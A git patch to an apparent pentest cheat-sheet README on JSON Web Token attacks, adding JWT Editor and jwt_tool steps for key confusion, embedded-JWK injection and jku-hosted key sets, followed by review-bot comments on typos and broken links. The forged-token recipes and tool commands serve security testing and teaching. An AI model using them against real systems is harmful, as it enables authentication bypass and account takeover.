From 579207aa8fd54cb044a6ca8e27a0a3121bdcc4c7 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 12 Mar 2023 18:02:29 +0100 Subject: [PATCH] JWT jku and jwks - manual exploitation --- JSON Web Token/README.md | 57 +++++++++++++++++++++++++++++++++------- 1 file changed, 47 insertions(+), 10 deletions(-) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 9332c94..c30451a 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -12,7 +12,7 @@ - [JWT Signature](#jwt-signature) - [JWT Signature - Null Signature Attack (CVE-2020-28042)](#jwt-signature---null-signature-attack-cve-2020-28042) - [JWT Signature - Disclosure of a correct signature (CVE-2019-7644)](#jwt-signature---disclosure-of-a-correct-signature-cve-2019-7644) - - [JWT Signature - None algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235) + - [JWT Signature - None Algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235) - [JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431)](#jwt-signature---key-confusion-attack-rs256-to-hs256-cve-2016-5431) - [JWT Signature - Key Injection Attack (CVE-2018-0114)](#jwt-signature---key-injection-attack-cve-2018-0114) - [JWT Secret](#jwt-secret) @@ -152,7 +152,7 @@ Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh ``` -### JWT Signature - None algorithm (CVE-2015-9235) +### JWT Signature - None Algorithm (CVE-2015-9235) JWT supports a `None` algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application. 
@@ -207,6 +207,17 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256') ```ps1 python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem ``` +* Using [portswigger/JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd) + 1. Find the public key, usually in `/jwks.json` or `/.well-known/jwks.json` + 2. Load it in the JWT Editor Keys tab, click `New RSA Key`. + 3. . In the dialog, paste the JWK that you obtained earlier: `{"kty":"RSA","e":"AQAB","use":"sig","kid":"961a...85ce","alg":"RS256","n":"16aflvW6...UGLQ"}` + 4. Select the PEM radio button and copy the resulting PEM key. + 5. Go to the Decoder tab and Base64-encode the PEM. + 6. Go back to the JWT Editor Keys tab and generate a `New Symmetric Key` in JWK format. + 7. Replace the generated value for the k parameter with a Base64-encoded PEM key that you just copied. + 8. Edit the JWT token alg to `HS256` and the data. + 9. Click `Sign` and keep the option: `Don't modify header` + * Manually using the following steps to edit an RS256 JWT token into an HS256 1. Convert our public key (key.pem) into HEX with this command. @@ -243,9 +254,14 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256') **Exploit**: -```ps1 -python3 jwt_tool.py [JWT_HERE] -X i -``` +* Using [ticarpi/jwt_tool] + ```ps1 + python3 jwt_tool.py [JWT_HERE] -X i + ``` +* Using [portswigger/JWT Editor](#) + 1. Add a `New RSA key` + 2. In the JWT's Repeater tab, edit data + 3. `Attack` > `Embedded JWK` **Deconstructed**: ```json 
@@ -432,17 +448,38 @@ It is sometimes exposed publicly via a standard endpoint: * `/api/keys` * `/api/v1/keys` +You should create your own key pair for this attack and host it. It should look like that: + +```json +{ + "keys": [ + { + "kid": "beaefa6f-8a50-42b9-805a-0ab63c3acc54", + "kty": "RSA", + "e": "AQAB", + "n": "nJB2vtCIXwO8DN[...]lu91RySUTn0wqzBAm-aQ" + } + ] +} +``` + **Exploit**: -```ps1 -python3 jwt_tool.py JWT_HERE -X s -python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json -``` +* Using [ticarpi/jwt_tool] + ```ps1 + python3 jwt_tool.py JWT_HERE -X s + python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json + ``` +* Using [portswigger/JWT Editor](#) + 1. Generate a new RSA key and host it + 2. Edit JWT's data + 3. Replace the `kid` header with the one from your JWKS + 4. Add a `jku` header and sign the JWT (`Don't modify header` option should be checked) **Deconstructed**: ```json -{"typ":"JWT","alg":"RS256", "jku":"https://example.com/jwks.json"}. +{"typ":"JWT","alg":"RS256", "jku":"https://example.com/jwks.json", "kid":"id_of_jwks"}. {"login":"admin"}. [Signed with new Private key; Public key exported] ```
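Review bot: In the hunk at @@ -207,6 +207,17 (JWT Editor steps for the RS256 to HS256 section), step 3 has a stray period after the list number: `3. . In the dialog, paste the JWK that you obtained earlier`. Drop the extra `. `. Step 2 already says to click `New RSA Key`, and step 3 then refers to "the dialog", so the two would read better merged or with the click moved to the start of step 3. In step 7, "a Base64-encoded PEM key that you just copied" should read "the Base64-encoded PEM key", and `k` should be in backticks like the other parameter names in this list.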
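Review bot: In the hunk at @@ -243,9 +254,14 (Key Injection exploit list), both tool links are broken: `[ticarpi/jwt_tool]` is a bare bracket reference with no URL or reference definition visible in this patch, and `[portswigger/JWT Editor](#)` points at an empty fragment. The @@ -207 hunk already uses the full BApp Store URL for JWT Editor, so reuse that target here and give jwt_tool a real link as well. Step 2, "In the JWT's Repeater tab, edit data", is also ambiguous about which tab is meant; naming the tab as it appears in the extension would help readers follow it.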
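Review bot: In the hunk at @@ -432,17 +448,38 (jku section), the same two placeholder links appear again, `[ticarpi/jwt_tool]` and `[portswigger/JWT Editor](#)`, and should get real targets consistent with the earlier hunk. The new sentence "It should look like that:" should be "It should look like this:". The examples are also inconsistent with each other: the sample JWKS uses the `kid` value `beaefa6f-8a50-42b9-805a-0ab63c3acc54` while the Deconstructed header uses `"kid":"id_of_jwks"`, and the jwt_tool line uses `http://example.com/jwks.json` while the header shows `https://example.com/jwks.json`. Pick one `kid` value and one URL scheme so readers can see that the header `kid` must match the entry in the hosted key set. Step 1 could also say that the key is hosted as a JWKS document in the format shown above, since "host it" alone does not say which format.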